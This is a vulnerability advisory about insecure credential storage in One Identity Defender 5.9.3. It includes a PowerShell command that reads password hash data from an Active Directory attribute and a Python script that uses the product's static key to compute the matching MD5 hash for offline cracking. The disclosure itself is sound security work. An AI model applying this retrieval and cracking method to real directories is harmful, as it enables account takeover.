Title: One Identity Defender - Insecure Cryptographic Storage
Date: 01 September 2019

Affected Software:
==================
One Identity Defender 5.9.3
Other versions are likely also vulnerable.

Insecure Cryptographic Storage:
==============================
Defender stores token seeds, PAP secrets, and user passwords in Active Directory attributes that are readable by all authenticated users. Defender passwords are hashed using MD5 in conjunction with a static key for obfuscation which allows the computed hash to be read from the defender-userTokenData attribute in Active Directory and then used in an offline brute force attack.

Hash Retrieval:

PS C:\Users\Duras> Get-ADUser Martok -Properties * | Select DistinguishedName, ObjectGUID, defender-userTokenData

DistinguishedName                    ObjectGUID                           defender-userTokenData
-----------------                    ----------                           ----------------------
CN=Martok,CN=Users,DC=QonoS,DC=local 52126f3a-723d-4b7e-a6ae-ccc2279e8618 {B:144:0505D1F541F69C63315DD85FBBDB7B4DC9E500000000000000000000000000000000000000000000000000000000000000000000000...

Hash Calculation:

#!/usr/bin/env python3
import binascii
import hashlib

guid = '52126f3a-723d-4b7e-a6ae-ccc2279e8618'
password = 'secret'
key = '45f88b08118bf03b8d55e452f77c2e8b'

guid = binascii.unhexlify(guid.translate(str.maketrans('', '', '-')))
guid = binascii.unhexlify(b''.join(map(binascii.hexlify, (guid[3::-1], guid[5:3:-1], guid[7:5:-1], guid[8:]))))

password = ('\00'.join([password[i:i+1] for i in range(0, len(password)+1, 1)])).encode()

hash = binascii.unhexlify(key) + password + guid

print (hashlib.md5(hash).hexdigest())

[duras@qonos ~]$ ./hash.py
d1f541f69c63315dd85fbbdb7b4dc9e5

Contact:
========
spicyitalian[at]protonmail[dot]com